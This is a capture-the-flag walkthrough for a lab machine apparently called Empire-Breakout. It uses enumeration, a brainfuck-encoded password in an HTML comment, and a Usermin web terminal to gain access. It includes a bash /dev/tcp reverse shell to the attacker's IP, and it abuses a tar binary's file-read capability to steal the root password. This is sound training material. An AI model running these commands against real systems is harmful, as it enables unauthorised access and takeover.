Walkthrough

Exploitation Guide for Empire-Breakout


Summary:
In this guide, we will thoroughly enumerate a web page and an SMB server to discover a set of
credentials to gain initial access. We will escalate privileges by discovering an .old_pass.bak file
and using the tar utility to access its contents in order to obtain root access.

Enumeration:
We begin the enumeration process with an nmap scan.

nmap -p- -sV -sC --open 192.168.120.156

PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
|_http-server-header: MiniServ/1.981
|_http-title: 200 — Document follows
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
|_http-server-header: MiniServ/1.830
|_http-title: 200 — Document follows

From the output of the scan we see ports 80, 139, 445, 10000 and 20000 open on the target:
an Apache web server, Samba, and two Webmin-family (MiniServ) web interfaces.

Using enum4linux we discover the username cyber. We will take note of this for future
reference.

Turning to port 80, we find the following snippet at the bottom of the page's source.

<!--
don't worry no one will get here, it's safe to share with you my access. Its
encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

-->

The "encrypted" text is not encrypted at all: it is a program in the brainfuck esoteric
language, which simply prints its output when run. Feeding it to an online brainfuck
interpreter (or deobfuscator) yields the password .2uqPEfj3D<P'a-3.

Turning our attention to port 20000, we are redirected to a Usermin admin panel login page.

We can enter the credentials discovered from our prior enumeration, cyber:.2uqPEfj3D<P'a-3.

By selecting the terminal window at the bottom of the screen, we are redirected to a terminal
where we can execute arbitrary commands.

We will proceed by obtaining a reverse shell, beginning by setting up a listener on our attack
machine.

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 4444
listening on [any] 4444 ...

Now we enter the following reverse shell payload on the web terminal, pointing it at our
attack machine's address (192.168.119.26 in this session, as the listener output below shows):

bash -i >& /dev/tcp/192.168.119.26/4444 0>&1

We receive a connection in our listener:

┌──(kali㉿kali)-[~]
└─$ sudo nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.119.26] from (UNKNOWN) [192.168.120.156] 33658
cyber@breakout:~$

Privilege Escalation:
Running getcap -r / 2>/dev/null, we see a tar binary with the cap_dac_read_search
capability set. This capability bypasses file read permission checks, so the binary can read
any file on the system regardless of its owner or mode.

Turning our attention to /var/backups, we discover a hidden .old_pass.bak file.

Combining these two findings, we use the capable tar binary to archive the file and then
extract the archive as our own user, revealing the contents of .old_pass.bak.

cyber@breakout:~$ ./tar -cvf old_pass /var/backups/.old_pass.bak
cyber@breakout:~$ ./tar -xvf old_pass
cyber@breakout:~$ cat var/backups/.old_pass.bak
Ts&4&YurgtRX(=~h

Now we can authenticate as root using the password Ts&4&YurgtRX(=~h.

cyber@breakout:~$ su root
su root
Password:Ts&4&YurgtRX(=~h

root@breakout:/home/cyber/var/backups# id
id
uid=0(root) gid=0(root) groups=0(root)
